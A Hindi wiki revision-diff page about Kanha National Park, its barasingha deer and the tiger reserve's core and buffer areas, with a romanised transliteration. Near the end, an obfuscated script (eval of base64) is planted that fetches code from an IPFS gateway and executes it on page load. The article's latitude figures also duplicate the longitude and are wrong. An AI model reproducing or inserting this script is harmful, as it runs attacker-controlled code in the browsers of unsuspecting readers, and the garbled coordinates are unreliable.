Difference between revisions of "कान्हा राष्ट्रीय उद्यान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
  कान्हा राष्ट्रीय उद्यान  
+
कान्हा राष्ट्रीय उद्यान  
आज की तारीख़ में बारासिंघा, कान्हा राष्ट्रीय उद्यान के अलावा दुनियां में कहीं भी नहीं मिलता। कान्हा का बारासिंघा दलदली हिरण यानी रेन डीयर (सर्वस डुवाउसेली)की एक उपप्रजाति है। इसने अपने आप को यहां की
+
आज की तारीख़ में बारासिंघा, कान्हा राष्ट्रीय उद्यान के अलावा दुनियां में कहीं भी नहीं मिलता। बारासिंघा के बारे में बात बाद में करेंगे, पहले कान्हा बाघ आरक्ष के बारे में कुछ जान लेते हैं।
 +
 
 +
कान्हा बाघ आरक्ष जो कि 1,949 वर्ग किलोमीटर में फैला है, इसके दो वन मंडल हैं, कोर क्षेत्र और बफ़र क्षेत्र। कोर क्षेत्र जिसमें कि यह राष्ट्रीय उद्यान स्थित है, उस का क्षेत्रफल है 940 वर्ग किलोमीटर और बफ़र क्षेत्र (बहुउपयोगीय क्षेत्र)का क्षेत्रफल है 1,009 वर्ग किलोमीटर।
 +
 
 +
कान्हा राष्ट्रीय उद्यान रेखांश 80 26 10 से 81 4 40 के बीच और अक्षांश 80 1 5 से 81 27 48 के बीच स्थित है। 
 +
 
 +
 
 +
 
 +
कान्हा का बारासिंघा, दलदली हिरण यानी रेन डीयर (सर्वस डुवाउसेली) की एक उपप्रजाति है। इसने अपने आप को यहां की सख़्त ज़मीन पर रहने के लिए ढाल लिया है।
  
  

Revision as of 12:05, 7 November 2010

kanha rashtriy udyan aj ki tarikh mean barasiangha, kanha rashtriy udyan ke alava duniyaan mean kahian bhi nahian milata. barasiangha ke bare mean bat bad mean kareange, pahale kanha bagh araksh ke bare mean kuchh jan lete haian.

kanha bagh araksh jo ki 1,949 varg kilomitar mean phaila hai, isake do van mandal haian, kor kshetr aur bafar kshetr. kor kshetr jisamean ki yah rashtriy udyan sthit hai, us ka kshetraphal hai 940 varg kilomitar aur bafar kshetr (bahuupayogiy kshetr)ka kshetraphal hai 1,009 varg kilomitar.

kanha rashtriy udyan rekhaansh 80 26 10 se 81 4 40 ke bich aur akshaansh 80 1 5 se 81 27 48 ke bich sthit hai.


kanha ka barasiangha, daladali hiran yani ren diyar (sarvas duvauseli) ki ek upaprajati hai. isane apane ap ko yahaan ki sakht zamin par rahane ke lie dhal liya hai.




panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh